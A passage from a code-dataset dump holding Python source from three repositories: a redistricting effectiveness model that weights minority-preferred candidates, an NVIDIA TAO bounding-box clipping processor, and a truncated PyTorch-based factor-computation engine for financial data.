district_support_all[('HCVAP', elec_set_dict[elec_set]['Runoff'])]\n hisp_pref_cand_dist = max(HCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n hisp_pref_cands_runoffs_dist.at[\n hisp_pref_cands_runoffs_dist[\"Election Set\"] == elec_set, district] = hisp_pref_cand_dist\n\n BCVAP_support_elec = district_support_all[('BCVAP', elec_set_dict[elec_set]['Runoff'])]\n black_pref_cand_dist = max(BCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n black_pref_cands_runoffs_dist.at[\n black_pref_cands_runoffs_dist[\"Election Set\"] == elec_set, district] = black_pref_cand_dist\n\n black_pref_conf_single_dist = [prob_conf_conversion(x) for x in black_pref_prob_single_dist]\n black_conf_W3_dist = np.append(black_conf_W3_dist, np.array([black_pref_conf_single_dist]).transpose(), axis=1)\n\n hisp_pref_conf_single_dist = [prob_conf_conversion(x) for x in hisp_pref_prob_single_dist]\n hisp_conf_W3_dist = np.append(hisp_conf_W3_dist, np.array([hisp_pref_conf_single_dist]).transpose(), axis=1)\n\n neither_pref_conf_single_dist = [prob_conf_conversion(x * y) for x, y in\n zip(black_pref_prob_single_dist, hisp_pref_prob_single_dist)]\n neither_conf_W3_dist = 
np.append(neither_conf_W3_dist, np.array([neither_pref_conf_single_dist]).transpose(),\n axis=1)\n\n # compute W2 (\"in-group\"-minority-preference weight)\n min_cand_black_W2_dist, min_cand_hisp_W2_dist, min_cand_neither_W2_dist = compute_W2(elec_sets, \\\n dist_changes,\n min_cand_weights_dict,\n black_pref_cands_prim_dist,\n hisp_pref_cands_prim_dist,\n cand_race_dict)\n ################################################################################ \n # compute final election weights per district\n recency_W1 = recency_W1.copy()[:, dist_changes]\n black_weight_dist = recency_W1 * min_cand_black_W2_dist * black_conf_W3_dist\n hisp_weight_dist = recency_W1 * min_cand_hisp_W2_dist * hisp_conf_W3_dist\n neither_weight_dist = recency_W1 * min_cand_neither_W2_dist * neither_conf_W3_dist\n\n return black_weight_dist, hisp_weight_dist, neither_weight_dist, black_pref_cands_prim_dist, \\\n black_pref_cands_runoffs_dist, hisp_pref_cands_prim_dist, hisp_pref_cands_runoffs_dist\n\n\ndef prob_conf_conversion(cand_prob):\n # parameters chosen to be ~0 confidence until 50% then rapid ascension to confidence ~ 1\n cand_conf = 1 / (1 + np.exp(18 - 26 * cand_prob))\n return cand_conf\n\n\ndef compute_final_dist(map_winners, black_pref_cands_df, black_pref_cands_runoffs, \\\n hisp_pref_cands_df, hisp_pref_cands_runoffs, neither_weight_array, \\\n black_weight_array, hisp_weight_array, dist_elec_results, dist_changes,\n cand_race_table, num_districts, candidates, \\\n elec_sets, elec_set_dict, mode, partition, logit_params, logit=False):\n \"\"\"\n Returns (Latino, Black, Neither, Overlap) effectiveness distribution for each district. \n The four values sum to one. State-specific rules governing what counts as a \"win\" for \n an election set are coded here (for example, rules about advancing to runoff elections etc.).\n \"\"\"\n general_winners = map_winners[map_winners[\"Election Type\"] == 'General'].reset_index(drop=True)\n primary_winners = map_winners[map_winners[\"Election Type\"] == 'Primary'].reset_index(drop=True)\n runoff_winners = map_winners[map_winners[\"Election Type\"] == 'Runoff'].reset_index(drop=True)\n\n black_pref_wins = np.empty((len(elec_sets), 0), float)\n hisp_pref_wins = np.empty((len(elec_sets), 0), float)\n\n primary_second_df = pd.DataFrame(columns=range(num_districts))\n primary_second_df[\"Election Set\"] = elec_sets\n\n prim_share_hpc = pd.DataFrame(columns=range(num_districts))\n prim_share_hpc[\"Election Set\"] = elec_sets\n prim_share_bpc = pd.DataFrame(columns=range(num_districts))\n prim_share_bpc[\"Election Set\"] = elec_sets\n party_gen_winner = pd.DataFrame(columns=range(num_districts))\n party_gen_winner[\"Election Set\"] = elec_sets\n\n primary_races = [elec_set_dict[elec_set][\"Primary\"] for elec_set in elec_sets]\n runoff_races = [None if 'Runoff' not in elec_set_dict[elec_set].keys() else elec_set_dict[elec_set][\"Runoff\"] for\n elec_set in elec_sets]\n cand_party_dict = cand_race_table.set_index(\"Candidates\").to_dict()[\"Party\"]\n\n for dist in dist_changes:\n black_pref_cands = list(black_pref_cands_df[dist])\n hisp_pref_cands = list(hisp_pref_cands_df[dist])\n\n primary_dict = primary_winners.set_index(\"Election Set\").to_dict()[dist]\n general_dict = general_winners.set_index(\"Election Set\").to_dict()[dist]\n runoffs_dict = runoff_winners.set_index(\"Election Set\").to_dict()[dist]\n primary_winner_list = [primary_dict[es] for es in elec_sets]\n general_winner_list = [general_dict[es] for es in elec_sets]\n runoff_winner_list = [\"N/A\" if es not 
in list(runoff_winners[\"Election Set\"]) \\\n else runoffs_dict[es] for es in elec_sets]\n\n primary_race_share_dict = {primary_race: dist_elec_results[primary_race][dist] for primary_race in\n primary_races}\n primary_ranking = {primary_race: {key: rank for rank, key in \\\n enumerate(sorted(primary_race_share_dict[primary_race], \\\n key=primary_race_share_dict[primary_race].get, reverse=True),\n 1)} \\\n for primary_race in primary_race_share_dict.keys()}\n\n second_place_primary = {primary_race: [cand for cand, value in primary_ranking[primary_race].items() \\\n if primary_ranking[primary_race][cand] == 2] for primary_race in\n primary_races}\n\n primary_second_df[dist] = [second_place_primary[key][0] for key in second_place_primary.keys()]\n\n black_pref_prim_rank = [primary_ranking[pr][bpc] for pr, bpc in zip(primary_races, black_pref_cands)]\n hisp_pref_prim_rank = [primary_ranking[pr][hpc] for pr, hpc in zip(primary_races, hisp_pref_cands)]\n\n prim_share_hpc[dist] = [primary_race_share_dict[prim_race][hpc] for prim_race, hpc in\n zip(primary_races, hisp_pref_cands)]\n prim_share_bpc[dist] = [primary_race_share_dict[prim_race][bpc] for prim_race, bpc in\n zip(primary_races, black_pref_cands)]\n party_general_winner = [cand_party_dict[gw] for gw in general_winner_list]\n party_gen_winner[dist] = party_general_winner\n\n # we always care who preferred candidate is in runoff if the minority preferred primary\n # candidate wins in district primary\n runoff_black_pref = [\"N/A\" if rw == \"N/A\" else \\\n bpc for rw, bpc in zip(runoff_winner_list, list(black_pref_cands_runoffs[dist]))]\n\n runoff_hisp_pref = [\"N/A\" if rw == \"N/A\" else \\\n hpc for rw, hpc in zip(runoff_winner_list, list(hisp_pref_cands_runoffs[dist]))]\n\n # winning conditions (conditions to accrue points for election set/minority group):\n black_accrue = [(prim_win == bpc and party_win == 'D') if run_race == None else \\\n ((bpp_rank < 3 and run_win == runbp and party_win == 'D') or \\\n (primary_race_share_dict[prim_race][bpc] > .5 and party_win == 'D')) \\\n for run_race, prim_win, bpc, party_win, bpp_rank, run_win, runbp, prim_race \\\n in zip(runoff_races, primary_winner_list, black_pref_cands, \\\n party_general_winner, black_pref_prim_rank, runoff_winner_list, \\\n runoff_black_pref, primary_races)]\n\n black_pref_wins = np.append(black_pref_wins, np.array([black_accrue]).transpose(), axis=1)\n\n hisp_accrue = [(prim_win == hpc and party_win == 'D') if run_race == None else \\\n ((hpp_rank < 3 and run_win == runhp and party_win == 'D') or \\\n (primary_race_share_dict[prim_race][hpc] > .5 and party_win == 'D')) \\\n for run_race, prim_win, hpc, party_win, hpp_rank, run_win, runhp, \\\n prim_race in zip(runoff_races, primary_winner_list, hisp_pref_cands, \\\n party_general_winner, hisp_pref_prim_rank, runoff_winner_list, \\\n runoff_hisp_pref, primary_races)]\n\n hisp_pref_wins = np.append(hisp_pref_wins, np.array([hisp_accrue]).transpose(), axis=1)\n\n neither_pref_wins = (1 - black_pref_wins) * (1 - hisp_pref_wins)\n\n if len(black_weight_array[0]) > 2:\n black_weight_array = black_weight_array[:, dist_changes]\n hisp_weight_array = hisp_weight_array[:, dist_changes]\n neither_weight_array = neither_weight_array[:, dist_changes]\n\n # election set weight's number of points are accrued if Black or Latino preferred candidate(s) win (or proxies do)\n neither_points_accrued = neither_weight_array * neither_pref_wins\n black_points_accrued = black_weight_array * black_pref_wins\n hisp_points_accrued = 
hisp_weight_array * hisp_pref_wins\n\n #####################################################################################\n # Compute district probabilities: Black, Latino, Neither and Overlap\n black_vra_elec_wins = list(np.sum(black_points_accrued, axis=0) / np.sum(black_weight_array, axis=0))\n black_gc = [min(1, (partition[\"BCVAP\"][i] / partition[\"CVAP\"][i]) * 2) for i in sorted(dist_changes)]\n black_vra_prob = [i * j for i, j in zip(black_vra_elec_wins, black_gc)]\n\n hisp_vra_elec_wins = list(np.sum(hisp_points_accrued, axis=0) / np.sum(hisp_weight_array, axis=0))\n hisp_gc = [min(1, (partition[\"HCVAP\"][i] / partition[\"CVAP\"][i]) * 2) for i in sorted(dist_changes)]\n hisp_vra_prob = [i * j for i, j in zip(hisp_vra_elec_wins, hisp_gc)]\n\n neither_vra_prob = list(np.sum(neither_points_accrued, axis=0) / np.sum(neither_weight_array, axis=0))\n\n # feed through logit:\n if logit == True:\n logit_coef_black = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Black'), 'coef'].values[0]\n logit_intercept_black = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Black'), 'intercept'].values[0]\n logit_coef_hisp = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Latino'), 'coef'].values[\n 0]\n logit_intercept_hisp = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Latino'), 'intercept'].values[0]\n logit_coef_neither = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Neither'), 'coef'].values[\n 0]\n logit_intercept_neither = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Neither'), 'intercept'].values[0]\n\n black_vra_prob = [1 / (1 + np.exp(-(logit_coef_black * y + logit_intercept_black))) for y in black_vra_prob]\n hisp_vra_prob = [1 / (1 + np.exp(-(logit_coef_hisp * y + logit_intercept_hisp))) for y in hisp_vra_prob]\n neither_vra_prob = [1 / (1 + np.exp(-(logit_coef_neither * y + logit_intercept_neither))) for y in\n neither_vra_prob]\n\n min_neither = [0 if (black_vra_prob[i] + hisp_vra_prob[i]) > 1 else 1 - (black_vra_prob[i] + hisp_vra_prob[i]) for i\n in range(len(dist_changes))]\n max_neither = [1 - max(black_vra_prob[i], hisp_vra_prob[i]) for i in range(len(dist_changes))]\n\n # uses ven diagram overlap/neither method\n final_neither = [round(min_neither[i], 3) if neither_vra_prob[i] < min_neither[i] else round(max_neither[i], 3) \\\n if neither_vra_prob[i] > max_neither[i] else round(neither_vra_prob[i], 3) for i in range(len(dist_changes))]\n final_overlap = [round(final_neither[i] + black_vra_prob[i] + hisp_vra_prob[i] - 1, 3) for i in\n range(len(dist_changes))]\n final_black_prob = [round(black_vra_prob[i] - final_overlap[i], 3) for i in range(len(dist_changes))]\n final_hisp_prob = [round(hisp_vra_prob[i] - final_overlap[i], 3) for i in range(len(dist_changes))]\n\n # when fitting logit, comment in:\n # final_neither = neither_vra_prob\n # final_overlap = [\"N/A\"]*len(dist_changes)\n # final_black_prob = black_vra_prob #[black_vra_prob[i] - final_overlap[i] for i in range(len(dist_changes))]\n # final_hisp_prob = hisp_vra_prob\n\n return dict(zip(dist_changes, zip(final_hisp_prob, final_black_prob, final_neither, final_overlap)))\n\n\ndef compute_W2(elec_sets, districts, min_cand_weights_dict, black_pref_cands_df, hisp_pref_cands_df, \\\n cand_race_dict):\n \"\"\"\n Returns in-group preferred candidate election weight 
(W2). This weight is 1 if the Latino-preferred\n candidate is Latino, etc.\n \"\"\"\n\n min_cand_black_W2 = np.empty((len(elec_sets), 0), float)\n min_cand_hisp_W2 = np.empty((len(elec_sets), 0), float)\n min_cand_neither_W2 = np.empty((len(elec_sets), 0), float)\n\n for dist in districts:\n black_pref = list(black_pref_cands_df[dist])\n\n black_pref_race = [cand_race_dict[bp] for bp in black_pref]\n black_cand_weight = [min_cand_weights_dict[\"Relevant Minority\"] if \"Black\" in bpr else \\\n min_cand_weights_dict[\"Other\"] for bpr in black_pref_race]\n min_cand_black_W2 = np.append(min_cand_black_W2, np.array([black_cand_weight]).transpose(), axis=1)\n\n hisp_pref = list(hisp_pref_cands_df[dist])\n hisp_pref_race = [cand_race_dict[hp] for hp in hisp_pref]\n hisp_cand_weight = [min_cand_weights_dict[\"Relevant Minority\"] if \"Hispanic\" in hpr else \\\n min_cand_weights_dict[\"Other\"] for hpr in hisp_pref_race]\n min_cand_hisp_W2 = np.append(min_cand_hisp_W2, np.array([hisp_cand_weight]).transpose(), axis=1)\n\n neither_cand_weight = [min_cand_weights_dict['Relevant Minority'] if ('Hispanic' in hpr and 'Black' in bpr) else \\\n min_cand_weights_dict['Other'] if ('Hispanic' not in hpr and 'Black' not in bpr) else \\\n min_cand_weights_dict['Partial '] for bpr, hpr in\n zip(black_pref_race, hisp_pref_race)]\n min_cand_neither_W2 = np.append(min_cand_neither_W2, np.array([neither_cand_weight]).transpose(), axis=1)\n\n return min_cand_black_W2, min_cand_hisp_W2, min_cand_neither_W2\n\n\ndef cand_pref_all_draws_outcomes(prec_quant_df, precs, bases, outcomes, sample_size=1000):\n \"\"\"\n To aggregrate precinct EI to district EI for district model score\n \"\"\"\n quant_vals = np.array([0, 125, 250, 375, 500, 625, 750, 875, 1000])\n draws = {}\n for outcome in outcomes.keys():\n draw_base_list = []\n for base in outcomes[outcome]:\n dist_prec_quant = prec_quant_df.copy()\n vec_rand = np.random.rand(sample_size, len(dist_prec_quant))\n vec_rand_shift = np.array(dist_prec_quant[base + '.' + '0']) + sum(\n np.minimum(np.maximum(vec_rand - quant_vals[qv] / 1000, 0), .125) * 8 * np.array(\n dist_prec_quant[base + '.' + str(quant_vals[qv + 1])] - dist_prec_quant[\n base + '.' + str(quant_vals[qv])]) for qv in range(len(quant_vals) - 1))\n draw_base_list.append(vec_rand_shift.astype('float32').T)\n draws[outcome] = np.transpose(np.stack(draw_base_list), (1, 0, 2))\n return draws\n\n\ndef cand_pref_outcome_sum(prec_draws_outcomes, dist_prec_indices, bases, outcomes):\n dist_draws = {}\n for outcome in outcomes:\n summed_outcome = prec_draws_outcomes[outcome][dist_prec_indices].sum(axis=0)\n unique, counts = np.unique(np.argmax(summed_outcome, axis=0), return_counts=True)\n prefs = {x.split('.')[1].split('_counts')[0]: 0.0 for x in outcomes[outcome]}\n prefs_counts = dict(zip(unique, counts))\n prefs.update(\n {outcomes[outcome][key].split('.')[1].split('_counts')[0]: prefs_counts[key] / len(summed_outcome[0]) for\n key in prefs_counts.keys()})\n dist_draws[outcome] = prefs\n return dist_draws\n","repo_name":"scott-norris-math/GerryWrap","sub_path":"src/run_functions.py","file_name":"run_functions.py","file_ext":"py","file_size_in_byte":25903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"20610523041","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom nvidia_tao_tf1.blocks.multi_source_loader.data_format import CHANNELS_FIRST\nfrom nvidia_tao_tf1.blocks.multi_source_loader.data_format import CHANNELS_LAST\nfrom nvidia_tao_tf1.blocks.multi_source_loader.processors.processor import (\n Processor,\n)\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import LABEL_OBJECT\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import SequenceExample\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import TransformedExample\nfrom nvidia_tao_tf1.core.coreobject import save_args\nfrom nvidia_tao_tf1.core.types import Example\n\n\nclass BboxClipper(Processor):\n \"\"\"Processor for adjusting bounding box labels after cropping.\n\n The following changes need to be made to bounding box labels:\n 1) Labels completely out of the network's input are discarded.\n 2) Labels that are 'half-in, half-out' should have their coordinates clipped to the input\n crop.\n 3) Labels from 2) also should have their ``truncation_type`` updated accordingly.\n \"\"\"\n\n @save_args\n def __init__(self, crop_left=0, crop_right=0, crop_top=0, crop_bottom=0):\n \"\"\"Constructor.\n\n If all of the provided crop coordinates are or 0, this processor will amount to a no-op.\n\n Args:\n crop_left (int): Left-most coordinate of the crop region.\n crop_right (int): Right-most coordinate of the crop region.\n crop_top (int): Top-most coordinate of the crop region.\n crop_bottom (int): Bottom-most coordinate of the crop region.\n\n Raises:\n ValueError: if crop_left > crop_right, or crop_top > crop_bottom.\n \"\"\"\n super(BboxClipper, self).__init__()\n self._no_op = False\n all_crop_coords = {crop_left, crop_right, crop_top, crop_bottom}\n if all_crop_coords == {0}:\n self._no_op = True\n\n if not self._no_op:\n if crop_left >= crop_right or crop_top >= crop_bottom:\n raise ValueError(\n \"Provided crop coordinates result in a non-sensical crop-region.\"\n )\n\n self._crop_left = float(crop_left)\n self._crop_right = float(crop_right)\n self._crop_bottom = float(crop_bottom)\n self._crop_top = float(crop_top)\n\n @property\n def supported_formats(self):\n \"\"\"Data formats supported by this processor.\n\n Returns:\n data_formats (list of 'DataFormat'): Input data formats that this processor supports.\n \"\"\"\n return [CHANNELS_FIRST, CHANNELS_LAST]\n\n def can_compose(self, other):\n \"\"\"\n Determine whether two processors can be composed into a single one.\n\n Args:\n other (Processor): Other processor instance.\n\n Returns:\n (bool): True if this processor knows how to compose the other processor.\n \"\"\"\n return False\n\n def compose(self, other):\n \"\"\"Compose two processors into a single one.\"\"\"\n raise NotImplementedError(\"BboxClipper.compose not supported.\")\n\n def _get_indices_inside_crop(self, coords):\n \"\"\"Get indices for bounding boxes that are at least partially inside the crop region.\n\n Args:\n coords (tf.Tensor): Float tensor of shape (N, 4) where N is the number of bounding\n boxes. 
Each bbox has coordinates in the order [L, T, R, B].\n\n Returns:\n valid_indices (tf.Tensor): Boolean tensor of shape (N,) indicating which bounding boxes\n in the input are at least partially inside the crop region.\n \"\"\"\n valid_indices = tf.ones(tf.shape(input=coords)[0], dtype=tf.bool)\n\n # False if left-most coordinate is to the right of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.less(coords[:, 0], self._crop_right)\n )\n # False if right-most coordinate is to the left of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.greater(coords[:, 2], self._crop_left)\n )\n # False if top-most coordinate is to the bottom of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.less(coords[:, 1], self._crop_bottom)\n )\n # False if bottom-most coordinate is to the top of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.greater(coords[:, 3], self._crop_top)\n )\n\n return valid_indices\n\n def _adjust_truncation_type(self, bbox_2d_label):\n \"\"\"Adjust the truncation_type of a label if it is half-in, half-out of the crop.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance for which we will update the\n truncation_type.\n\n Returns:\n adjusted_label (Bbox2DLabel): Adjusted version of ``bbox_2d_label``.\n \"\"\"\n if isinstance(bbox_2d_label.truncation_type, tf.SparseTensor):\n new_coords = bbox_2d_label.vertices.coordinates.values\n # Get LTRB.\n x1, y1, x2, y2 = (\n new_coords[::4],\n new_coords[1::4],\n new_coords[2::4],\n new_coords[3::4],\n )\n\n left_most_in = tf.logical_and(\n tf.greater_equal(x1, self._crop_left),\n tf.less_equal(x1, self._crop_right),\n )\n top_most_in = tf.logical_and(\n tf.greater_equal(y1, self._crop_top),\n tf.less_equal(y1, self._crop_bottom),\n )\n right_most_in = tf.logical_and(\n tf.greater_equal(x2, self._crop_left),\n tf.less_equal(x2, self._crop_right),\n )\n bottom_most_in = tf.logical_and(\n tf.greater_equal(y2, self._crop_top),\n tf.less_equal(y2, self._crop_bottom),\n )\n # Needs adjustment if top-left corner is inside and bottom-right corner is outside, or\n # vice versa.\n half_in_half_out = tf.math.logical_xor(\n tf.logical_and(left_most_in, top_most_in),\n tf.logical_and(right_most_in, bottom_most_in),\n )\n\n old_truncation_type = bbox_2d_label.truncation_type\n new_truncation_type_values = tf.cast(\n tf.logical_or(\n tf.cast(\n old_truncation_type.values, dtype=tf.bool\n ), # Why is this int32??\n half_in_half_out,\n ),\n dtype=tf.int32,\n )\n\n new_truncation_type = tf.SparseTensor(\n values=new_truncation_type_values,\n indices=old_truncation_type.indices,\n dense_shape=old_truncation_type.dense_shape,\n )\n\n return bbox_2d_label._replace(truncation_type=new_truncation_type)\n\n # This corresponds to the case where the `truncation_type` field is not present.\n return bbox_2d_label\n\n def _clip_to_crop_region(self, bbox_2d_label):\n \"\"\"Clip the coordinates to the crop region.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance to clip.\n\n Returns:\n clipped_label (Bbox2DLabel): Clipped version of ``bbox_2d_label``.\n \"\"\"\n input_coords = bbox_2d_label.vertices.coordinates.values\n xmin, ymin, xmax, ymax = (\n input_coords[::4],\n input_coords[1::4],\n input_coords[2::4],\n input_coords[3::4],\n )\n\n xmin = tf.clip_by_value(xmin, self._crop_left, self._crop_right)\n ymin = tf.clip_by_value(ymin, self._crop_top, self._crop_bottom)\n xmax = tf.clip_by_value(xmax, self._crop_left, self._crop_right)\n ymax = tf.clip_by_value(ymax, 
self._crop_top, self._crop_bottom)\n\n clipped_coords = tf.stack([xmin, ymin, xmax, ymax], axis=1)\n clipped_coords = tf.reshape(clipped_coords, [-1]) # Flatten.\n\n new_coords = tf.SparseTensor(\n values=clipped_coords,\n indices=bbox_2d_label.vertices.coordinates.indices,\n dense_shape=bbox_2d_label.vertices.coordinates.dense_shape,\n )\n new_vertices = bbox_2d_label.vertices._replace(coordinates=new_coords)\n\n return bbox_2d_label._replace(vertices=new_vertices)\n\n def _adjust_bbox_2d_label(self, bbox_2d_label):\n \"\"\"Apply adjustments due to cropping to bounding box labels.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance to apply the adjustments to.\n\n Returns:\n adjusted_label (Bbox2DLabel): Adjusted version of ``bbox_2d_label``.\n \"\"\"\n input_coords = bbox_2d_label.vertices.coordinates.values\n # For convenience, reshape input coordinates.\n input_coords = tf.reshape(input_coords, [-1, 4]) # Order is L, T, R, B.\n\n # First, figure out which ones are completely outside the crop.\n valid_indices = self._get_indices_inside_crop(input_coords)\n\n adjusted_label = bbox_2d_label.filter(valid_indices)\n\n # Now, determine, which ones need to have their coordinates clipped and truncation_type\n # adjusted.\n adjusted_label = self._adjust_truncation_type(adjusted_label)\n adjusted_label = self._clip_to_crop_region(adjusted_label)\n\n return adjusted_label\n\n def process(self, example):\n \"\"\"\n Process an example.\n\n Args:\n example (Example): Example with frames in format specified by data_format.\n\n Returns:\n (Example): Processed example.\n\n Raises:\n ValueError: Since this processor explicitly needs to be applied after transformations\n (if they are present), it does not accept TransformedExample.\n \"\"\"\n if isinstance(example, TransformedExample):\n raise ValueError(\n \"BboxClipper should be applied on labels that have been transformed.\"\n )\n\n if not self._no_op:\n if isinstance(example, (Example, SequenceExample)):\n if LABEL_OBJECT in example.labels:\n example.labels[LABEL_OBJECT] = self._adjust_bbox_2d_label(\n bbox_2d_label=example.labels[LABEL_OBJECT]\n )\n\n return example\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/blocks/multi_source_loader/processors/bbox_clipper.py","file_name":"bbox_clipper.py","file_ext":"py","file_size_in_byte":10428,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"3891210019","text":"from typing import Union, Iterable, Tuple, Dict\nimport warnings\nfrom .factor import BaseFactor\nfrom .filter import FilterFactor, StaticAssets\nfrom .datafactor import ColumnDataFactor, AdjustedColumnDataFactor\nfrom ..plotting import plot_quantile_and_cumulative_returns, plot_chart\nfrom ..data import DataLoader\nfrom ..parallel import ParallelGroupBy\nimport pandas as pd\nimport numpy as np\nimport torch\n\n\nclass OHLCV:\n open = ColumnDataFactor(inputs=('',), should_delay=False)\n high = ColumnDataFactor(inputs=('',))\n low = ColumnDataFactor(inputs=('',))\n close = ColumnDataFactor(inputs=('',))\n volume = ColumnDataFactor(inputs=('',))\n\n\nclass FactorEngine:\n \"\"\"\n Engine for compute factors, used for back-testing and alpha-research both.\n \"\"\"\n\n # friend private:\n\n @property\n def dataframe_(self):\n return self._dataframe\n\n @property\n def loader_(self):\n return self._loader\n\n def get_group_(self, group_name):\n return self._groups[group_name]\n\n def column_to_tensor_(self, data_column) -> torch.Tensor:\n # cache data with column prevent double copying\n if data_column in self._column_cache:\n return self._column_cache[data_column]\n\n series = self._dataframe[data_column]\n data = torch.from_numpy(series.values).to(self._device, non_blocking=True)\n self._column_cache[data_column] = data\n return data\n\n def column_to_parallel_groupby_(self, group_column: str, as_group_name=None):\n if as_group_name is None:\n as_group_name = group_column\n if as_group_name in self._groups:\n return\n\n series = self._dataframe[group_column]\n if series.dtype.name == 'category':\n cat = series.cat.codes\n else:\n cat = series.values\n keys = torch.tensor(cat, device=self._device, dtype=torch.int32)\n self._groups[as_group_name] = ParallelGroupBy(keys)\n\n def revert_(self, data: torch.Tensor, group: str, factor_name: str) -> torch.Tensor:\n return self._groups[group].revert(data, factor_name)\n\n def revert_to_series_(self, data: torch.Tensor, group: str, factor_name: str) -> pd.Series:\n array = self.revert_(data, group, factor_name).cpu()\n return pd.Series(array, index=self._dataframe.index)\n\n def group_by_(self, data: Union[torch.Tensor, pd.Series], group: str) -> torch.Tensor:\n if isinstance(data, torch.Tensor):\n return self._groups[group].split(data)\n elif isinstance(data, pd.Series):\n data = torch.tensor(data.values, device=self._device)\n return self._groups[group].split(data)\n elif isinstance(data, np.ndarray):\n data = torch.tensor(data, device=self._device)\n return self._groups[group].split(data)\n else:\n raise ValueError('Invalid data type, should be tensor or series.')\n\n # private:\n\n def _prepare_tensor(self, start, end, max_backwards):\n # Check cache, just in case, if use some ML techniques, engine may be called repeatedly\n # with same date range.\n if start == self._last_load[0] and end == self._last_load[1] \\\n and max_backwards <= self._last_load[2]:\n return\n self._groups = dict()\n\n # Get data\n df = self._loader.load(start, end, max_backwards).copy()\n # If possible, pre-screen\n if isinstance(self._filter, StaticAssets):\n df = df.loc[(slice(None), self._filter.assets), :]\n if df.shape[0] == 0:\n raise ValueError(\"The assets {} specified by StaticAssets filter, was not found in \"\n \"DataLoader.\".format(self._filter.assets))\n # check history data is insufficient\n df.index = df.index.remove_unused_levels()\n history_win = df.index.levels[0].get_loc(start, 'bfill')\n if history_win < max_backwards:\n 
warnings.warn(\"Historical data seems insufficient. \"\n \"{} rows of historical data are required, but only {} rows are obtained. \"\n \"It is also possible that `calender_asset` of the loader is not set, \"\n \"some out of trading hours data will cause indexing problems.\"\n .format(max_backwards, history_win),\n RuntimeWarning)\n # post processing data\n if self._align_by_time:\n # since pandas 0.23, MultiIndex reindex is slow, so using a alternative way here,\n # but still very slow.\n # df = df.reindex(pd.MultiIndex.from_product(df.index.levels))\n df = df.unstack(level=1).stack(dropna=False)\n if self.timezone != 'UTC':\n df = df.reset_index('asset').tz_convert(self.timezone)\\\n .set_index(['asset'], append=True)\n\n self._dataframe = df\n self._dataframe_index = [df.index.get_level_values(i) for i in range(len(df.index.levels))]\n\n # asset group\n cat = self._dataframe_index[1].codes\n keys = torch.tensor(cat, device=self._device, dtype=torch.int32)\n self._groups['asset'] = ParallelGroupBy(keys)\n\n # time group prepare\n self.column_to_parallel_groupby_(self._loader.time_category, 'date')\n\n self._column_cache = {}\n if isinstance(self._filter, StaticAssets):\n # if pre-screened, don't cache data, only cache full data.\n self._last_load = [None, None, None]\n else:\n self._last_load = [start, end, max_backwards]\n\n def _compute_and_revert(self, f: BaseFactor, name) -> torch.Tensor:\n stream = None\n if self._device.type == 'cuda' and self._enable_stream:\n stream = torch.cuda.current_stream()\n data = f.compute_(stream)\n return self._groups[f.groupby].revert(data, name)\n\n # public:\n\n def __init__(self, loader: DataLoader) -> None:\n self._loader = loader\n self._dataframe = None\n self._dataframe_index = None\n self._groups = dict()\n self._last_load = [None, None, None]\n self._column_cache = {}\n self._factors = {}\n self._filter = None\n self._device = torch.device('cpu')\n self._enable_stream = False\n self._align_by_time = False\n self.timezone = 'UTC'\n\n @property\n def device(self):\n return self._device\n\n @property\n def dataframe_index(self):\n return self._dataframe_index\n\n def create_tensor(self, group: str, dtype, values, nan_values) -> torch.Tensor:\n return self._groups[group].create(dtype, values, nan_values)\n\n @property\n def align_by_time(self):\n return self._align_by_time\n\n @align_by_time.setter\n def align_by_time(self, enable: bool):\n \"\"\"\n If `enable` is `True`, df index will be the product of 'date' and 'asset'.\n This method is slow, recommended to do it in your DataLoader in advance.\n \"\"\"\n self._align_by_time = enable\n\n def add(self,\n factor: Union[Iterable[BaseFactor], BaseFactor],\n name: Union[Iterable[str], str],\n replace=False) -> None:\n \"\"\"\n Add factor or filter to engine, as a column.\n \"\"\"\n if isinstance(factor, Iterable):\n for i, fct in enumerate(factor):\n self.add(fct, name and name[i] or None)\n else:\n if name in self._factors and not replace:\n raise KeyError('A factor with the name {} already exists.'\n 'please specify a new name by engine.add(factor, new_name)'\n .format(name))\n self._factors[name] = factor\n\n def set_filter(self, factor: Union[FilterFactor, None]) -> None:\n self._filter = factor\n\n def get_filter(self):\n return self._filter\n\n def get_factor(self, name):\n return self._factors[name]\n\n @property\n def factors(self):\n return self._factors.copy()\n\n def clear(self):\n self.remove_all_factors()\n self.set_filter(None)\n\n def empty_cache(self):\n self._last_load = [None, None, 
